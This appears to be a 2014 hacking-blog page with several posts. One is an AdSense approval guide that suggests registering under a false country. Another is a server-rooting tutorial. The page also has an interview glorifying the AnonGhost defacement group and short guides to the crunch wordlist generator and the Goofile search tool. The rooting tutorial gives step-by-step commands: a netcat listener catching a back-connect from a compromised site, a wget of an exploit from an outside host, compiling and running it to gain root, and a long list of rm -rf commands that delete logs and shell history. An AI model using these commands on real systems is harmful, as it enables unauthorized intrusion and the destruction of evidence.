Monday, 10 March 2014

Approve Adsense Account in 1 Hour

No comments :



Follow My Steps:







    First of all login with your Gmail account otherwise if you dont have then create a new 
Note: If your country is not supported by Adsense then choose a country like US and UK, while creating New GMail Account.





  • Login to your “YouTube” Account by visiting https://www.youtube.com/


Now go to http://youtube.com/account_monetization



  • Enable Monetization for your YouTube Account. As given in screenshot below:








  • Then Click on Monetize Button.










  • After doing that, You will receive an E-Mail in your Inbox. 




  • Now, Upload a Unique video in your YouTube Account. While doing that, Don’t forget to add appropriate description and Tags for videos. Wait for the upload to get completed. Once done, Publish it.

  • To associate your account with Google Adsense Visit https://www.youtube.com/account_monetization and expand the topic “How Will I be Paid” and click on the link “Associate an Adsense Account“. The screenshot of the same is given below:





  • Now, You will be redirected to a screen, Where you will have to set up your Adsense Account. Click on “Continuebutton for filling your other details such as Address, Country, Payee Name etc.








    After clicking on “Continue” button you will see the below given screen. Enter all details correctly.







  • After filling all details, Click on “Submit” button. And wait for atleast 1 to 2 hours. You will get an E-Mail containing the details of  an Approved Adsense Account. And enjoy.
Read More

SERVER ROOTING TUTORIAL Step by Step With Pictures

No comments :

Things Required :




  1. NetcaT
  2. Shelled site
  3. Local root expl0it 




Step By Step Tutorial :
First go to Run & type cmd then type : cd C:\Program Files\Netcat  ( Make sure that you Netcat is saved in the following directory )


Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .


Its time to open your shell & then connect  using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .Type Open Port In PHP Backconnect and Hit Enter



So you have successfully connected ..  Then now we have to get our Local Root Exploit, like mine is  2.6.18-374 2011 . 




In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder . 
Type this command to change dir to /tmp : cd /tmp
To upload your your exploit we will use wget function . 
Type : wget http://www.somesite.com/exploit.c 

Now this will upload the exploit in the tmp folder . 



 (Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit

Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. 

(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

Type: unzip exploit.zip 

After we have done all the above steps correctly, its time to give permission so we will type the following  command 
Type: chmod 777 exploit
Now  its time to run the Exploit, to run the exploit we will type the following command 
Type: ./exploit

Now the exploit will run & the server will be rooted  ;) .  To check weather we got root we can type 

Type: id or whoami  




Clearing Logs:

Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

Read More

Sunday, 9 March 2014

An interview with Hackers group Anonghost

No comments :

Anonghost, leaded by Mauritania Attacker, hacker group that hacked thousands of websites including government website, Database leaks, email leaks and Mark Zuckerberg Facebook Account's hijacking.


Members:
Mauritania Attacker (founder and admin) - Virusa Worm - SpitFir3 - ManSyk3z - Deto Beiber - BL4ckc0d1n6 - Dr.SàM!M_008 - Sky Lion - Kais Patron - Ian Surgent - B0o3nAs - Gbs Aremiey - Mr Domoz - RetnOHacK - Tak Dikenal - Chahid inj3ctor - b3ta - Rehber Khan - AnonxoxTN - Spec Tre - PsyferR - Raka 3r00t - Gh0st_3xp10!t - PirateX - kopra1337 - Bl4ck Jorozz - Riad Spamer - VirUs AsEr AlrOoh - Younes Lmaghribi - Zaky - Joker Inside - AreTheiS



Projects: 
#OpIsrael, #OpUSA, #OpPETROL,#Op Israel Birthday

Zone-H
Http://zone-h.com/archive/notifier=AnonGhost


Anon Ghost



1. All Though you are anonymous, would you like to share which country you belong from, or some thing about you?

Anon Ghost: we are not anonymous , we are a Team , we do not hide behind masks, we belong from
Mauritania Morocco Malaysia Indonesia Tunisia Usa Ireland
etc..



2.When did u find your interest in hacking?

Anon Ghost: we were Teamr00t , we launched AnonGhost 7 months ago



3.Why was it that you liked hacking, why you hack?

Anon Ghost: we spread awareness over the world , we do not hack for fun , we hack to spread our voice


4.What was your first hacking project, was it secret, if u want to share it, or else go with first which u can share with us?

Anon Ghost: yea , many secrets hacked by AnonGhost , we are different from other Teams we do not hide things or use them for benefice , we have one goal is to expose secrets of the Governments , if you google AnonGhost you will find all secrets


5.Ever thought of becoming white hat?

Anon Ghost: one day maybe


6.we know about your major projects,, which do you think, top ten hacking projects you are involved in?

Anon Ghost: we launched #OpIsrael 7 april it was the biggest op ever
we launched
#OpUSA
we are now launching #OpPETROL
AND NEXT OP
is #OpMyanmar
we do not anticipet



7.Is there any project, which you thought you should not have done, yes or no,, may be you would like to tell us about it?

Anon Ghost: i don't think so , we are able to do anything we want , all projects has been done successfully , we have good choice and we do not listen to people if we want to do something , we see all things in the positive side




8.HAVE YOU GOT YOUR ACCOUNT HACKED EVER?


Anon Ghost: haha never ever , and this is the thing that will never happen , and we are sure 10000000000000% hacking us is called impossible.



9.ever got into trouble due to hacking?

Anon Ghost: no never , we are organzized Team , that's why , we are united , we stand together , we are like a family




10. 5 hackers which are your inspiration. or you like them most?

Anon Ghost: well , i think there is only one he is called Farid Essabar from Morocco his nickname is Diablo




11.Which method would you use, to breach into small websites?

Anon Ghost: we use priv8 methods , we do not use programs or any software , we do only manual hacking , no BACKTRACK , no Metasploit , and just to remind you we do not breach small websites




12.Got something else that you want to share, with your friends, your enemy and the entire world?



Anon Ghost: yeaa
just a little message...!!!

for our haterz "we are AnonGhost , we still powerful , and we will stay , and we understand you , just dream more to be like us "

for our friends

" we keep fighting till the last second we do not surrender , we execute , we lead , we improve "

for the entire world

" Most of People are blind , they can't do difference between positive and negative things , because The Governments of the World has brainwashed them , and we will keep exposing the truth "

THIS INTERVIEW WAS TAKEN FROM-- Mauritania Attacker (founder and admin)

Read More

How to make a wordlist in BackTrack 5

No comments :

How to make a wordlist in BackTrack 5

Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations.




Features
  • crunch generates wordlists in both combination and permutation ways
  • it can breakup output by number of lines or file size
  • now has resume support
  • pattern now supports number and symbols
  • pattern now supports upper and lower case characters separately
  • adds a status report when generating multiple files
  • new -l option for literal support of @,%^
  • new -d option to limit duplicate characters see man file for details
  • now has unicode support
Run it..
Go to Applications->BackTrack->Privilege escalation->Password attacks->Offline attacks->crunch
Usage
./crunch 6 8 abc123! -o wordlist.lst
To produce passwords that contain only a b c 1 2 3 ! and have length between 6 and 8 characters.

Read More

Saturday, 8 March 2014

Information Gathering Using Backtrack Tool Goofile

No comments :

Information Gathering Using Backtrack Tool Goofile

Goofile 

This is a cool little tool that comes packaged with Backtrack but also can be downloaded from http://code.google.com/p/goofile/downloads/list
The Goofile tool can search for a specific file in a given domain. The little but powerful tool was written in python by Thomas Richards at www.g13net.com.

Goofile can be found in Backtrack under Applications | Backtrack | Information Gathering | Web Application Analysis | Open source Analysis or you can open a terminal windows and enter the following command:

 cd /pentest/enumeration/google/goofile



To conduct a search using the tool Goofile you only need to type the following command in a terminal:


./goofile.py -d "domain" -f "filetype" (PHP,PDF,TXT)

"./goofile" is used to invoke the goofile python script. "-d" switch is used to specify the target domain to be searched "-f" switch is used to specify which type of files you want goofile to attempt to locate. 










Read More